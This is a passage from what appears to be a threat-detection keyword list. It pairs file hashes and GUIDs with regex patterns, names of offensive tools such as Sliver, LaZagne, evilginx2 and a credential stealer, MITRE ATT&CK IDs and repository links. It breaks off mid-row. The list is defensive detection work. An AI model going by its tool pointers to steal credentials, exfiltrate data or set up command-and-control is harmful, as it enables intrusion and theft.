"*3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc*",".{0,1000}3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf*",".{0,1000}3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3BB0CD58-487C-4FEC-8001-607599477158*",".{0,1000}3BB0CD58\-487C\-4FEC\-8001\-607599477158.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*3bb553cd-0a48-402d-9812-8daff60ac628*",".{0,1000}3bb553cd\-0a48\-402d\-9812\-8daff60ac628.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213*",".{0,1000}3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c*",".{0,1000}3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012*",".{0,1000}3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*3C601672-7389-42B2-B5C9-059846E1DA88*",".{0,1000}3C601672\-7389\-42B2\-B5C9\-059846E1DA88.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 
- TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*3C8AA457-3659-4CDD-A685-66F7ED10DC4F*",".{0,1000}3C8AA457\-3659\-4CDD\-A685\-66F7ED10DC4F.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05*",".{0,1000}3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d*",".{0,1000}3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2*",".{0,1000}3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login 
credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26*",".{0,1000}3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064*",".{0,1000}3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*3D111394-E7F7-40B7-91CB-D24374DB739A*",".{0,1000}3D111394\-E7F7\-40B7\-91CB\-D24374DB739A.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f*",".{0,1000}3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5*",".{0,1000}3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4*",".{0,1000}3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f*",".{0,1000}3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9*",".{0,1000}3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1*",".{0,1000}3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc*",".{0,1000}3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731*",".{0,1000}3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65*",".{0,1000}3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c*",".{0,1000}3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c*",".{0,1000}3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff*",".{0,1000}3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77*",".{0,1000}3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736*",".{0,1000}3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11*",".{0,1000}3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3e3fcf025697ee80f044716eee053848*",".{0,1000}3e3fcf025697ee80f044716eee053848.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d*",".{0,1000}3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2*",".{0,1000}3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1*",".{0,1000}3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3EAB01B5-9B49-48D8-BFA1-5493B26CCB71*",".{0,1000}3EAB01B5\-9B49\-48D8\-BFA1\-5493B26CCB71.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 
"*3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350*",".{0,1000}3ebdcf2fcbe2c7439b0b0e3bc4dcd00a4fd4df7f02e88b160f085b35f5d2f350.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8*",".{0,1000}3ec41c041f4c5b1c1c781ddcd9d0286a0a920253783edb27a8fc8085d9ecb6f8.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31*",".{0,1000}3ec8a46dfacff51b3a19034479c2c68b74c92342e483295152754f939a8d1d31.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*",".{0,1000}3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099*",".{0,1000}3ed6aa523846443c89fc204956bf871d327a14862e0a65dad6e6f4854937e099.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966*",".{0,1000}3ee6cff71aef9e5d12e628c94a0c30e37b283f424aa487cf37248690d88c8966.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*3F0C3D9A-CFB8-4DB5-8419-1C28CBC8621D*",".{0,1000}3F0C3D9A\-CFB8\-4DB5\-8419\-1C28CBC8621D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e*",".{0,1000}3f511ce7fdc81166c2e8811560fb1a2b30b5568ccd184d915f23fd5494cd969e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*3F5558BD-7B94-4CB0-A46C-A7252B5BCA17*",".{0,1000}3F5558BD\-7B94\-4CB0\-A46C\-A7252B5BCA17.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 
"*3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed*",".{0,1000}3f58f14b7d8ecab48c17849a6c6660dee3f39e95ba3799f9d77339fa6b7914ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f*",".{0,1000}3f63c1d262a6e900833b2dbd615f72006785c124d4ca7fda01cd621ca615865f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a*",".{0,1000}3f70ddcfdf1308b16a0951689520f74df87bc472cccd2e7b2ca1316b4d2b0a3a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb*",".{0,1000}3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194*",".{0,1000}3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689*",".{0,1000}3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 